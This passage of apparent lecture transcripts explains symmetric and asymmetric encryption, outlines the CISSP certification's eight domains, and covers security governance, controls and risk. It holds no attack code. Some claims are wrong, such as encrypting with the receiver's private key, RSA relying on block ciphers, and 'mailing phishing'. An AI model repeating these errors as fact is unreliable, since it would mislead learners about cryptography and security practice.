messages and do so mainly without the knowledge of the sender and the receiver. So it is the priority to keep the encryption and decryption key private at all times. Should it fall into the wrong hands, the third party can send messages to either the sender or the receiver using the same key to encrypt the message. Upon receiving the message and decrypting it with the key, it is impossible to guess its origin. If the sender somehow transmits the secret key along with the ciphertext, anyone can intercept the package and access the information. Consequently, this encryption category is termed private key cryptography, since a big part of the data's integrity is riding on the promise that the users can keep the keys secret. This terminology contrasts with asymmetric key cryptography, which is called public key cryptography because it has two different keys at play, one of which is public. Provided we manage to keep the keys secret, we still have to choose what kind of ciphers we want to use to encrypt this information. In symmetric key cryptography, there are broadly two categories of ciphers that we can employ. Let us have a look. Stream ciphers are the algorithms that encrypt basic information one bit at a time. It can change depending on the algorithm being used, but usually it relies on a single bit or byte to do the encryption. This is the relatively quicker alternative considering the algorithm doesn't have to deal with blocks of data at a single time. Every piece of data that goes into the encryption can and needs to be converted into binary format. In stream ciphers, each binary digit is encrypted one after the other. The most popular ones are the RC4, Salsa, and Panama. The binary data is passed through an encryption key, which is a randomly generated bit stream. Upon passing it through, we receive the ciphertext that can be transferred to the receiver without fear of man-in-the-middle attacks. The binary data can be passed through an algorithmic function. It can have either XOR operations, as it is most of the time, or any other mathematical calculations that have the singular purpose of scrambling the data. The encryption key is generated using the random bitstream generator and it acts as a supplement in the algorithmic function. The output is in binary form, which is then converted into the decimal or hexadecimal format to give our final ciphertext. On the other hand, block ciphers dissect the raw information into chunks of data of fixed size. The size of these blocks depend on the exact cipher being used. A 128-bit block cipher will break the plain text into blocks of 128-bit each and encrypt those blocks instead of a single digit. Once these blocks are encrypted individually, they are chained together to form a final ciphertext. Block ciphers are much slower, but they are more tamper-proof and are used in some of the most widely used algorithms employed today. Just like stream ciphers, the original ciphertext is converted into binary format before beginning the process. Once the conversion is complete, the blocks are passed through the encryption algorithm along with the encryption key. This would provide us with the encrypted blocks of binary data. Once these blocks are combined, we get a final binary string. This string is then converted into hexadecimal format to get our ciphertext. Today, the most popular symmetric key algorithms like AES, DES, and 3DES are all block cipher methodology subsets. With so many factors coming into play, there are quite a few things symmetric key cryptography excels at while falling short in some other. Symmetric key cryptography is much faster variant when compared to asymmetric key cryptography. There is only one key in play, unlike asymmetric encryption, and this drastically improves calculation speed in the encryption and decryption. Similarly, the performance of symmetric encryption is much more efficient under similar computational limitations. Fewer calculations help in better memory management for the host system. Bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms. Since they are much quicker, handling large amounts of data is simple and easy to use in servers and data farms. This helps in better latency during data recall and fewer mixed packets. Thanks to its simple single key structure, symmetric key cryptography algorithms are much easier to set up a communication channel with and offer a much more straightforward maintenance duties. Once the secret key is transmitted to both the sender and receiver without any prior mishandling, the rest of the system aligns easily and everyday communications becomes easy and secure. If the algorithm is applied as per the documentation, symmetric algorithms are very robust and can encrypt vast amounts of data with very less overhead. In a last video on cryptography, we took a look at symmetric key cryptography. We used a single private key for both the encryption and decryption of data, and it works very well in theory. Let's take a look at a more realistic scenario now. Let's meet Joe. Joe is a journalist who needs to communicate with Ryan via long-distance messaging. Due to the critical nature of the information, people are waiting for any message to leave Joe's house so that they can intercept it. Now Joe can easily use symmetric key cryptography to send the encrypted data, so that even if someone intercepts the message, they cannot understand what it says. But here's the tricky part. How will Joe send the required decryption key to Ryan? The sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages. Otherwise, Ryan cannot decrypt the information even when he receives the ciphertext. If someone intercepts the key while transmitting it, there is no use in employing cryptography since a third party can now decode all the information easily. Key sharing is a risk that will always exist when symmetric key cryptography is being used. Thankfully, asymmetric key encryption has managed to fix this problem. Let's understand what asymmetric key cryptography is. Asymmetric encryption uses a double layer of protection. There are two different keys at play here, a private key and a public key. A public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post-transit. These pair of keys must belong to the receiver of the message. The public keys can be shared via messaging, blog posts or key servers, and there are no restrictions. As you can see in the image, the two keys are working in the system. The sender first encrypts the message using the receiver's private key, after which we receive the ciphertext. The ciphertext is then transmitted to the receiver without any other key. On getting the ciphertext, the receiver uses his private key to decrypt it and get the plain text back. There has been no requirement of any key exchange throughout this process, therefore solving the most glaring flaw faced in symmetric key cryptography. The public key known to everyone cannot be used to decrypt the message, and the private key which can decrypt the message need not be shared with anyone. The sender and receiver can exchange personal data using the same set of keys as often as possible. To understand this better, take the analogy of your mailbox. Anyone who wants to send you a letter has access to the box and can easily share information with you. In a way, you can say the mailbox is publicly available to all, but only you have access to the key that can open the mailbox and read the letters in it. This is how the private key comes to play. No one can intercept the message and read its contents since it's encrypted. Once the receiver gets its contents, he can use his private key to decrypt the information. Both the public key and the private key are generated, so they are interlinked, and you cannot substitute other private keys to decrypt the data. In another example, if Alice wants to send a message to Bob, let's say it reads "Call me today," she must use Bob's public key while encrypting the message. Upon receiving the cipher message, Bob can proceed to use his private key in order to decrypt the message, and hence complete security is attained during transmission without any need for sharing the key. Since this type of encryption is highly secure, it has many uses in areas that require high confidentiality. It is used to manage digital signatures, so there is valid proof of a document's authenticity. With so many aspects of business transitioning to the digital sphere, critical documents need to be verified before being considered authentic and acted upon. Thanks to asymmetric cryptography, senders can now sign documents with their private keys. Anyone who needs to verify the authenticity of such signatures can use the sender's public key to decrypt the signature. Since the public and the private keys are linked to each other mathematically, it's impossible to repeat this verification with duplicate keys. Document encryption has been made very simple by today's standards, but the background implementation follows a similar approach. In blockchain architecture, asymmetric key cryptography is used to authorize transactions and maintain the system. Thanks to its two key structures, changes are reflected across the blockchain's peer-to-peer network only if it is approved from both ends. Along with asymmetric key cryptography's tamper-proof architecture, its non-repudiation characteristic also helps in keeping the network stable. We can also use asymmetric key cryptography combined with symmetric key cryptography to monitor SSL or TLS encrypted browsing sessions to make sure nobody can steal our personal information when accessing banking websites or the internet in general. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys required, and generating a session using those keys to ensure maximum security instead of the rather insecure HTTP website format. Security parameters differ on a session-by-session basis, so the verification process is consistent and utterly essential to modern data security. Another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography. With the most significant difficulty in symmetric encryption being key exchange, asymmetric keys can help clear the shortcoming. The original message is first encrypted using a symmetric key. The key used for encrypting the data is then converted into the ciphertext using the receiver's public key. Now we have two ciphertexts to transmit to the receiver. On receiving both of them, the receiver uses his private key to decrypt the symmetric key. He can then use it to decrypt the original information on getting the key used to encrypt the data. While this may seem more complicated than just asymmetric key cryptography alone, symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions. Encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure. You might remember us discussing why symmetric encryption was called private key cryptography. Let us understand why asymmetric falls under the public key cryptography. We have two keys at our disposal. The encryption key is available to everyone. The decryption key is supposed to be private. Unlike symmetric key cryptography, there is no need to share anything privately to have an encrypted messaging system. To put that into perspective, we share our email address with anyone looking to communicate with us. It is supposed to be public by design so that our email login credentials are private and they help in preventing any data mishandling. Since there is nothing hidden from the world, if they want to send us any encrypted information, this category is called the public key cryptography. There are quite a few algorithms being used today that follow the architecture of asymmetric cryptography, none more famous than the RSA encryption. RSA encryption is the most widely used encryption or public key encryption standard using asymmetric key approach. Named after its founders, Rivest, Shamir, and Edelman, it uses block ciphers to obscure the information. If you are unfamiliar with how block ciphers work, they are encryption algorithms that divide the original data into blocks of equal size. The block size depends on the exact cipher being used. Once they are broken down, these blocks are encrypted individually and later chained together to form the final ciphertext. Widely considered to be the most secure form of encryption, albeit relatively slower than symmetric encryption algorithms, it is widely used in web browsing, secure identification, VPNs, emails, and other chat applications. With so many variables in play, there must be some advantages that give asymmetric key cryptography an edge over the traditional symmetric encryption methodologies. Let's go through some of them. There is no need for any reliable key sharing channel in asymmetric encryption. It was an added risk in private key cryptography that has been completely eliminated in public key architecture. The key which is made public cannot decrypt any confidential information, and the only key that can decrypt doesn't need to be shared publicly under any circumstance. We have much more extensive key lengths in RSA encryption and other asymmetric algorithms like 2048-bit key and 4096-bit keys. Larger keys are much harder to break into via brute force and are much more secure. Asymmetric key cryptography can use as a proof of authenticity, since only the rightful owner of the keys can generate the messages to be decrypted by the private key. The situation can also be reversed. Encryption is done using a private key and decryption is done by the public key, which would not function if the correct private key is not used to generate the message, hence proving the authenticity of the owner. It also has a tamper protection feature where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data. Consequently, the public key cannot decrypt the message, and it is easy to realize the information is not 100% legitimate when and where the case requires.
So let's start off this tutorial by understanding the need for the CISSP certification. If you have seen our previous videos, you would be aware of the various cybersecurity certifications like CCNA, CompTIA Security Plus, CISM, CISA, and CEH to name a few. You might have also come across the CISSP certification. Let me tell you, this is one of the toughest and most in-demand certification in the cybersecurity field. In the current times, managing information security in a company can be extremely challenging. With the advent of the internet and various other technologies, there is a large exposure to various security breaches. The presence of information security experts in-house helps organizations manage their IT processes in a better way. This is where a CISSP professional is in demand by employers. Compared to the other cybersecurity professionals, the demand for CISSP certified professionals has grown rapidly. There are nearly 50,000 job postings for the same. Now that you have an idea of the demand of CISSP certified professionals, let's move on to understanding what exactly is CISSP. CISSP stands for Certified Information Systems Security Professional. It is considered the gold standard in the field of information security. This certification is taken up by IT professionals. It trains a candidate to become an information assurance professional. Taking up the CISSP certification will help you define the design, architecture, controls, and management of highly secure business environments. You will also be called a CISSP professional only after you successfully pass the CISSP exam. So now let's have a look into the CISSP exam requirements. The primary requirement for any candidate is that they should have at least 5 years of work experience in the field of information security. In addition to this, it is also suggested that the candidate clears other certifications like CCNA, CompTIA Security Plus, CEH, CISM, and CISA to name a few. CISSP is considered as an advanced level cybersecurity certification. Hence, it is better if the candidate clears the basic level and the managerial level certifications before moving to the CISSP certification. As I mentioned earlier, this certification is suitable for professionals who have a minimum of 5 years of work experience. Professionals working as security consultants and managers, network and security architects, IT directors, security auditors, and chief information security officers can take up the CISSP certification. Let's now move on to our next topic, that is CISSP domains. This entire certification is grouped into a total of 8 domains. The broad spectrum of topics included in CISSP ensure its relevance across all disciplines in the field of information security. Successful candidates are competent in the following 8 domains. They are security and risk management, then we have asset security, security engineering, communications and network security, followed by identity and access management, then security assessment and testing, security operations, and finally we have software development security. These 8 domains deal with different aspects of information security. We will have a look into each of these individually and understand what each of these domains symbolize. First up, we have the security and risk management domain. As the name suggests, this domain mainly consists of the fundamentals of security policies, compliance law and regulations, professional ethics, risk management, and threat modeling. Cybersecurity and information security plays a major role in this domain. There is a difference between cybersecurity and information security which is more often missed out on by people. Cybersecurity refers to several techniques used to protect the integrity of networks, whereas information security refers to processes and tools deployed to protect sensitive information. To implement cybersecurity, we have a list of approaches like compliance-based, ad hoc, and risk-based. In compliance-based, security measures are decided based on regulations, while in ad hoc, security measures are based on no specific criteria. In risk-based, security measures are based on unique risks depending on the organization. Let's now have a look at the CIA Triad. Here, C stands for confidentiality, I for integrity, and A for availability. Confidentiality, integrity, and availability have served as the industry standard for computer security since the time of the first mainframes. Confidentiality means that information and functions can be accessed only by authorized parties, for example, military secrets. Integrity means that information and functions can be added, altered, or removed only by authorized people. And availability means that systems, functions, and data must be available on demand. Now that we have understood the CIA Triad, let's have a look at the GRC Trilogy. This trilogy is a structured approach adopted by organizations to align IT objectives with business objectives. First up, we have governance. Such a program has motives like ensuring goals are achieved, providing strategic plans, and so on. Governance is taken care of by the senior professionals of an organization. Next up, we have risk management. Here, the organization looks into mitigating all types of risks such as investment, physical, and cyber risks. Finally, we have compliance. As discussed previously, compliance refers to abiding by the defined laws and regulations. So who do you all think develops a security policy which is used to achieve the organization's goals? Well, it is done by the senior management of an organization. Let's have a look at the characteristics of these security policies. First and foremost, these policies should support the vision and mission of the company. All the business units should be integrated in these security policies. They should also be regularly updated. And finally, it is important that these security policies should be easy to understand so that everyone can abide by them without any problem. In addition to security policies, a risk analysis team is also formed in organization to perform the analysis of each known risk. There are various steps to perform risk analysis. Let's have a look at each of these. First, the team makes an assessment of the value of the company's assets. Then, there is an analysis made based on the risks to assets. And finally, the team discovers solutions to mitigate these risks. Now that was all about the first domain of CISSP, security and risk management. Let's have a look at the second domain, asset security. Asset security deals with the collection and protection of assets such as data and devices. Here, we will be looking into data classification, data management, data remnants, and data loss prevention. So in data classification, the data owner classifies data. A data owner can be an individual or a group of people who created the information and are directly responsible for it. This classification is done based on a set of predefined criteria. At the end, the classification is annually reviewed to see if there has to be some change incorporated. Data management involves managing the information lifecycle needs of an enterprise in an effective manner. It also ensures that the data complies to the set standards. And finally, data management also ensures data validity and integrity. Moving on to data remnants. It is a term used for the residual of digital data that is present even after trying to erase the data. Data remnants should be avoided as data should be completely destroyed. To tackle data remnants, we have methods like overwriting and destruction to name a few. In overwriting, other information is written over the data several times so that the original data cannot be recovered. In destruction, data in the storage device is physically damaged to make recovery difficult. Asset security also looks into data loss prevention. Here, several measures and risk assessments are performed to ensure that information is only available to authorized users. Let's now move on to our third domain, security engineering. As the name suggests, this domain talks about security architecture, security models, cryptography, and physical security. Security architecture establishes a common practice for creating, analyzing, and using architecture description within a particular domain. Security architecture takes the help of TCB, that is Trusted Computing Base, security perimeter, and reference models to implement security. Cryptography is also a part of security engineering. In cryptography, information is secured by converting data from a readable format to a non-readable format and vice versa. Moving to our fourth domain, we have communications and network security. This domain is all about network structures, transmission methods, and security measures used to achieve CIA in an organization. OSI model is the foundation of networking. This model, that is the Open Systems Interconnection Model, OSI model, describes how data is transferred from one computer to another. The OSI model consists of 7 layers, starting from physical layer, then data link layer, network layer, transport layer, session layer, presentation layer, and finally application layer. In the first layer, that is, physical layer transmits raw bit stream over the physical medium. Then data link layer defines the format of data on the network. Network layer provides logical addressing and it also provides path determination using local addressing. The fourth layer, that is transport layer, provides end-to-end connections. In this layer, data is transmitted using transmission protocols including TCP and UDP. The session layer maintains connections and it is also responsible for controlling ports and sessions. The sixth layer, that is the presentation layer, ensures that data is in a usable format. And finally, in the seventh layer, that is in the application layer, human-computer interaction happens. Here, applications can access the network services. The communications and network security domain also talks about firewalls. We can define a firewall as a hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer. Then we also have the IDS. IDS is known as the Intrusion Detection System. This is designed to detect unauthorized access to a system. IDS is used together with a firewall and a router. Moving to identity and access management, our fifth domain, let's have a look at what this domain is all about. This domain of CISSP is all about the access control, identification, authorization, and attacks on access control and its countermeasures. To be able to access a dataset or a resource, a subject has to be identified, authenticated, and authorized. Identity management, Kerberos, and access criteria are few of the crucial fields here. In identity management, through automated means, users are identified and authenticated. This domain also speaks of Kerberos, an authentication protocol that is based on symmetric key cryptography and provides end-to-end security. Access to data shouldn't be granted to anyone and everyone. In fact, it should be granted based on the level of trust and the job role in the organization. It is also better if it is provided based on the location and the time. Let's now have a look at our sixth domain, security assessment and testing. So in this domain, we will look into audits, security control assessment and testing reports. As you might have heard of the term audit, it is nothing but a repeated process wherein an independent professional evaluates and analyzes evidence. Then we have vulnerability assessment, wherein IT risks are identified and evaluated. It helps in identifying, quantifying, and prioritizing vulnerabilities. A well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation. The assessment and test is executed by a working group called the Integrated Product Team. Testing is performed to check the data flow between the application and the system. Up next, we have the security operations domain. The seventh domain of CISSP is all about investigations, monitoring and logging, disaster recovery, and change management. Here, we will look into the fields of digital forensics, incident management, and perimeter security. Investigation of a computer crime is also known as computer forensics. In digital forensics, data is examined to identify, recover, and analyze opinions about digital information. Incident management works to restore the services to normal as soon as possible. A team called the Incident Response Team is deployed to handle such emergencies. Incident response is defined as a practice of detecting a problem, determining its cause, minimizing the damage, resolving the problem, and documenting each step. This team provides management with sufficient information and defends the company against future attacks. In perimeter security, there is perimeter defense, which allows us to detect and keep a check on unauthorized physical access. This field also controls the access to the facility. Moving on to our eighth and final domain, we have software development security. As the name suggests, this domain talks about security in a software development lifecycle. Here, we will be looking into topics like API, malware, spyware, adware, social engineering attacks, and SQL injection attack. Let's start off with the application program interface known as API. API is basically a collection of protocols and functions used to create applications. It supports formats such as representational state transfer REST and simple object access protocol. REST is nothing but using the present features of the web in a simple way. And SOAP, which is an acronym for Simple Object Access Protocol, is a messaging protocol for exchanging data among computers. Now let's move on to malware as a security threat. Malware is a term which refers to malicious software, viruses, ransomware, and worms. We can also call Trojan virus as a form of malware which is capable of disguising itself as a legitimate software. Malware is basically a broad term that refers to a variety of malicious programs. One way to protect your software from malware is to always double-check your downloads. Moving on to our next security threat, spyware. As the name suggests, this is a software that typically spies on your system. Spyware is also a type of malware which is used to secretly gather information of the victim to give it to a third party. Those programs that secretly record all that you do on your computer are called spyware. It is always advised to turn on pop-up blockers to prevent spyware. Next up, we have adware. Adware is also known as advertising supported software. It is a type of malware that constantly displays ads and pop-ups. Some of such ads can also gather your information. At times, adware is not all that dangerous, but it is a hassle as it is a gateway to unwanted advertising on the screen, and it can also change the browser homepage. Adwares are known to display unwanted, annoying advertisements on your screens. Let's now have a look at social engineering attacks. It is basically the art of manipulating people so that they end up giving their confidential information. This attack lures victims into handing over their confidential data. This attack takes place by tricking the human mind. The most common social engineering attacks are phishing, spear phishing, and mailing phishing attack. Phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source. This is done to install malware or to steal sensitive data like credit card information and various other login credentials. Spear phishing attack is a variation of phishing. Here, the attacker targets a specific individual or a group of people. And in whaling phishing attack, wealthy, powerful, and prominent individuals are made targets. Moving on to our next attack, we have SQL injection attack. SQL injection attack is a type of code injection attack. In a database-driven website, the hacker manipulates a standard SQL query. It allows attackers to tamper with the existing data. Here, malicious code is inserted into the SQL server to obtain information.
So, in CISSP, as with every security course, we start off with the CIA Triad. Now here CIA is confidentiality, integrity, and availability. So it starts off with every security mechanism. When we talk about security and we want to keep things secure, what is it that we want to secure? It is the data of an organization that is the most valuable asset to the organization, and that's what we want to secure. When we say that we want the data to be secured, we basically talk about three aspects for that data. The first and the foremost, that the data needs to remain confidential. The second aspect, that the data needs to be trustworthy. And the third concept, that the data should be available to all authorized users when and where they require it. So going back to the first point, when we say we want data to be confidential, what do we mean by that? By confidentiality, we talk about that data being made available only to authorized users after you have authenticated them, ensured or assured of their authenticity, and only then you're going to give access to that data, right? So even if you go into an organization has a hierarchy of governance, right? So only certain people with certain clearances or certain job titles can have access to certain amount of data, whereas other people may not have access to it. For example, a person working in the sales department will not have access to data that is accessed by the HR department. Thus, that's what we are looking at: classification of data and keeping it confidential, only making it available to those people who require it. When we say trustworthiness or the integrity of that data, the integrity is where the data has been altered, modified, removed, deleted by unauthorized people. So we want to prevent that, which means when we say we want the integrity intact, we want to ensure that only authorized people can modify, alter, or remove data if they are allowed to do so. So that's where the authorization and authentication comes into the picture again. And data needs to be available. For me to safeguard data, I can just lock it up in a safe, throw the safe in the depth of an ocean, and say that the data is secure because it cannot be leaked out. But that data is no longer available to authorized users, hence that data is useless. For me, data would have value when the data remains confidential, has its trustworthiness intact, and is still available to all the users that are authorized to access it. So when we talk about security, we want these three aspects to be implemented on any and every digital asset that the organization has, and thus, once these 3 points are guaranteed or at least assured to a certain extent, we can then say that the data or that particular asset is secured. Moving on, let's talk about information security. Information security is the process of protecting data and information systems. So in the CIA, as we talked about it, when we said what do we want to protect, we want to protect all the information assets or the technical assets that we have from any of the vulnerabilities that can be identified. So we want to restrict unauthorized access and use. We want to restrict deletion, accidental or intentional, if they have not been authorized to do so, modification of data, so the integrity part, and destruction of data. Destruction could not only be deleting data, but it could be something like a ransomware where the data gets encrypted, so it's still there, it's just not accessible to you. Now, information security ensures the implementation of these following aspects. The first and foremost comes from information security policies, which is the governance aspect of it. The policies are designed to have a implementation of security in an organization that helps the business processes to be executed in a secure manner. Where are these policies coming from? They come from standards or guidelines which are globally available and based on which we can start developing our security policies. For example, if I want to develop a security policy in my organization, I might want to depend on frameworks like ISO 27001, COBIT, or something similar. Once I have these standards set, I would come back to procedures. Procedures being how are these standards to be executed. right? For example, in my policies, I ensured that I want encryption of AES 256 to be implemented, or rather in the policy, I determined that we want encryption to be implemented on a data set based on the classification of those data. So in my policies, I would determine how the classification is going to work, how data is going to be classified on what parameters, and thus once the data gets classified, we are going to come back to standards where we say if it is classified as confidential data, we want to use encryption to protect that data, and we want AES 256 to be utilized for encryption. So how do we go about it? How do we implement the encryption? That's where your procedures come into the picture. Your guidelines are troubleshooting mechanisms, optional documents. So if somebody has trouble following the procedures, they might want to go into the guidelines and see how to troubleshoot the scenario that they are facing. Baselines are basically the minimum achievable target that you want to go with these policies. So let's say when I say I want to have a baseline on a server where for the server to be published onto the internet or to be used in production environment, it has to meet a certain criteria, which means I can go back to the hardware and I can say the server needs a hardware configuration of X, Y, and Z. Let's say a Xeon processor with 16 cores, 128 gigs of RAM. So that's a baseline that I need for a particular server for it to be put into production environment for a particular use. Anything above that is acceptable, but nothing should go below that. Then comes the risk management. While we are implementing these policies, procedures, we have those standards in place. If we face any risk during that period, or if we face any threat or a vulnerability is identified during this period, all these terms we are going to discuss in a little bit. So when we identify vulnerabilities or threats, that's where our risks come into the picture. The risk management comes in saying, okay, this is a risk that we have identified, and now how do we want to mitigate the risk? Then the security organization comes into the picture, the day-to-day activity of how security is to be implemented. And for all of these procedures, policies, baselines, standards to be implemented, to be ensured that to be assured that they are working properly, we need to make our employees aware that these policies exist. This is something that they need to follow. Thus, the awareness or the security education comes into the picture. Here, the security education is more focused on helping employees adhere to the company policies and standards rather than educating employees about security. We don't want to make everybody an ethical hacker. We just want to ensure them or we want to assure the organization that everybody has been warned about policies, procedures, security requirements, and they are going to follow those requirements. For example, a password policy where you have to adhere to a specific password policy to ensure passwords are created. At the same time, there is another password policy which says that you should not share passwords with your colleagues no matter what. So for me, for my employees to follow that, I need to make them aware that these policies exist and there are repercussions if they do not follow these particular policies. So coming back to the governance part, what is governance since we have been talking about it? Governance ensures that the security strategies are aligned with business objectives and consistent with regulations. So what does it guarantee? Appropriate information security activities are being performed. Based on what? Based on the policies that we have created, based on the standards that we have and the baselines that we would have created. So security has to be comparable, right? So if I say I have secured against particular attacks, the attacks have to be identified, and then compared to those particular attacks, I can say I have mitigated these activities by having specific security controls. Thus, I can say that I am secure. The governance aspects keeps a watch on all these security controls to see that those security activities are ensured, are being implemented, and are performing to the best of their abilities. That's where your governance comes into the picture. The risks being reduced, so the risk management also comes under the governance, where you're looking at newly identified risks and you're then implementing security controls that would mitigate these risks. Then we're looking at information security investments appropriately directed. So when I say I want a security control, which would be a firewall, IDS, IPS, antiviruses, whatever is required, it needs to have a return on investment which is acceptable for the organization. You don't want to spend up too much of money in security, thus creating losses for the organization. When you say a business objective is always to make money rather than lose money. So security should be a supporting feature to the business objectives, where the services are being provided by the business in a secure manner in such a way that they can still have a positive return on investment on the services that are being provided. And the executive management can determine the program's effectiveness. This is the major part, because we have to, even in any compliances, audits, technical audits, we have to prove that whatever we have implemented actually works, is effective, thus mitigating the risk. If your security controls are not effective, then you have just wasted a bucket load of money and have not achieved any security measures in your exercise. moving on to security controls. Security controls are measures taken to safeguard an information system from an attack, basically for the CIA Triad, the confidentiality, integrity, and availability. So security controls could be administrative controls, technical controls, or physical security controls. What are administrative security controls? They would be policies, procedures that we have in place. So the password policy becomes an administrative control where the management has made everybody aware that the password needs to meet a particular complexity, should not be shared, and thus becomes an administrative security control. A technical security control would be where we are implementing this policy, and thus when I try to create a password, there is a software that maps the password to the complexity requirements, assures or ensures that the complexity requirements have been met, and thus allows the password to be accepted or rejects the password as the case may be. That is a security control. A physical security control may be, let's say, a CCTV camera which you're going to use to monitor people and ensure that nothing untoward happens. It's not only against physical crime, but let's say access to a particular room where nobody is seen tailgating. Maybe monitoring a server room which is very well secured and ensuring that unauthorized people do not get access or purposefully or intently do not access that area at all times. So these are the 3 levels of security controls that can be implemented to enhance the security of an organization. Then we come to security policies. Policies is an overall broad statement produced by a senior management that dictates the role of security within the organization. For example, the password policy that we talked about, it just said that it needs to meet a certain complexity, which is a broad statement that is being made by the management saying we want to adhere to this policy to ensure that we do not get hacked by brute force attacks or dictionary attacks or whatever it is. The broad statement is trying to prevent certain attacks from happening on the organization. How it is implemented, that's where the procedures and everything else comes into the picture. It must integrate security into all business processes. So if I start creating a policy which ensures that the complexity should be so high that the password should be at least 20 characters strong, that would be detrimental to the organization's health because people may not remember those passwords, or resetting those passwords, or having technical mechanisms, technical security controls in place to implement that kind of stringent security may be too expensive to have. So whatever policies are created, they need to be in line with the business processes as well. The policy must be reviewed and modified periodically or as company changes. So as and when the company becomes more mature and can have more levels of security, they must look at their policies again and redefine them. Or as a company grows or changes market scenarios or changes business processes, these policies may become redundant. So you want to look at those policies and implement newer policies or modify the existing policies to suit the business processes in a better manner. It must support vision and mission of the organization. A business once established will always have a long-term vision. For example, the e-tailer example that we are talking about, for me to open an e-tailer, e-retailing website, I don't want it to be periodic. I don't want it to be for a month or something like that. I want to achieve success in that factor, and I want to create a plan of where I want to reach, let's say in the next 5 years. So how do I achieve that? That's something that I need to plan as a business plan. All my security mechanisms that are in place should be in alignment with the business plans, business visions across the number of years that we have envisaged the business to perform. So that's where the policies come into the picture. Policies are always long-term, not short-term documents, but need to be periodically reviewed and modified as the business grows or business changes its posture. Then looking at compliance. Compliance means conforming to a rule such as a specification, policy, standard, or law. So we have looked at compliance from a perspective where we talked about ISO 27001 or PCI DSS or those frameworks. Now these are not laws, but these are standards or frameworks that have been created over a period of time through experience. And these are targeted towards organizations, towards specific industries. For example, PCI DSS is only towards finance organizations where they have payment gateways in place. The ISO 27001 is a more generic policy which can be implemented by various organizations. HIPAA, Health Insurance Portability and Accountability Act, is an American act that talks about health-related data of its citizens. So these are compliances. These may not be laws, but you need to adhere to these to be effective and to be allowed to conduct business in that particular industry. Then we have Code of Ethics. Code of Ethics state safety of the Commonwealth, duty to our principles and to each other requires that we adhere and be seen to adhere to the highest ethical standards of behavior. Therefore, strict adherence to this code is a condition of certification. What are the ethics? Protect society, the Commonwealth and the infrastructure, act honorably, honestly, justly, responsibility, and legally, prove diligent and competent service to the principals, advance, and profession. Now, the code of ethics are codes created by ISC Square for the CISSP professional, and you need to adhere to these codes. If they identify violation of these codes from any member, they would debar the member, strip them of the certification, and even blacklist them based on whatever ethics they have violated. So even before the exam, you have to go through the code of ethics. You have to accept the code of ethics. In the exam, you may get up to 5 to 6 questions just on code of ethics. Then comes the legal systems. That's where the law comes into the picture. Law could differ from country to country or from region to region, and thus, depending on which country you're in, you may need to be aware of those laws of those countries. As far as CISSP is concerned, ISC Square is concerned, they are an American organization, so they would talk about mostly American laws and a few European laws or directives as well. So there are 3 different laws that we talk about: civil, common, and religious laws. Depends on the country, the culture of that particular country. The information security professional should understand the different legal systems followed internationally. So you also may come across the classification as civil law, criminal law, and law of torts. Civil law is basically a law where, let's say, a contract has been breached and it's not criminal in nature. You just want to sue an organization for breach of contract. Criminal law is where something criminal has happened under the particular act of that particular country, like let's say a murder or an attack that has happened, a physical attack, or something got stolen. And the third one was the law of torts, where it's more of a compensatory law where you can file a case, a civil suit, demand compensation in lieu of the wrongs that have happened to that particular organization or that individual. Then comes the personal security. The people inside the organization need access to data to complete their assigned work and hence have the potential to misuse these privileges. And thus, you should have personnel security as well. Now, when we talk about hiring practices for people, most of the organizations perform background checks, and we get confused why these background checks are being done. The background checks are essential to the health of the organization, where you are ensuring that the person is not a malicious person, has the prerequisite certifications or the qualifications, have never been debarred or have never been prosecuted, do not have a criminal background, thus preventing physical attacks on the organization. For example, a competitor may attempt to place in your organization a spy to gather information on the secrets of that organization and report it back to the competitor. A background check may reveal that this person was previously employed by a competitor, and thus you might want to verify that how that employment got terminated, when did it get terminated, or is this person misusing anything or misrepresenting any aspect of his or their life. Then you also need to get confidentiality agreements signed with them. For example, NDAs, non-disclosure agreements, data that is being shared with them, the ownership of that particular data, and what are the repercussions if that confidentiality is breached by that particular person. Conflict of interest agreements for positions handling competitive information. As you go higher up in the organization, you might come across contracts where it prohibits a particular person in engaging into the same activity with a competitor for a particular period of time. So if there is a conflict of interest when you're hiring a person where they have signed such a agreement with another competitor or another organization, you don't want to embroil yourself in a lawsuit where the other organization may sue you for hiring a person while they were still under that particular contract. So it's not only to look at the background of these people, but to safeguard the organization from any lawsuits or any violations of contract as well. Get the non-compete agreements for the positions in charge of unique corporate processes. That again goes on to say if you're going to leave the organization, you cannot start up a competing business similar to the organization's business, and so on and so forth. Now let's come back to the technical aspect and start talking about vulnerability, threats, and risk. Now, what is a vulnerability? It is nothing but a weakness in a system or a process, implies the absence of a countermeasure. Vulnerability is internal and is more easily managed. So it's basically a flaw or a misconfiguration or a design flaw or something like using defaults, username, passwords, configurations, where if that particular flaw is misused, it will lead into a security event on that particular device for that particular organization. So when we say a security event, it has to be detrimental in nature. So if somebody is using a weak password that can easily be cracked, that is a vulnerability where you have identified a weak password, and then you want to prevent that vulnerability by imposing a security control or a countermeasure. The security control here starts off with the policy of having a robust security policy where a password policy comes in that describes the complexity of a particular password. And then you talk about a technical countermeasure where you have implemented an identity and access management plan, which would ensure that the person creating that password adheres to the complexity of that particular policy. Then a threat. The threat is the possibility that the vulnerability might be exploited, which will result in loss. So if somebody has created a weak password and it has been allowed, that's a vulnerability which can be exploited by the usage of brute force attacks or dictionary based attacks to crack passwords. If the password is cracked, somebody unauthorized may get access to that data, thus resulting in a loss for that organization. So the threat is the possibility of that particular vulnerability being exploited. And then comes the risk. The risk is basically the likelihood of that attack being happened. So I have a weak password. It can be exploited by a brute force or dictionary attack. The likelihood of that attack is what determines the risk level for me. Now the likelihood will always be hypothetical, but we don't want to run helter-skelter and we do not want to take the possibility to extreme. So that's where your business processes come into the picture. Your security policies come into the picture. Based on the business processes and the policies implemented, if I have a weak password, what would be the loss that I would face for that particular person? For example, a fresher coming into an organization having a weak password but having limited access to data would have a lesser risk because of the loss being lesser than a CEO of an organization using a weak password and thus getting exploited, because the CEO will have access to more proprietary data that if gets into the competitor's hand would lead in huge losses. Thus, the same risk of having a password cracked for a fresher will 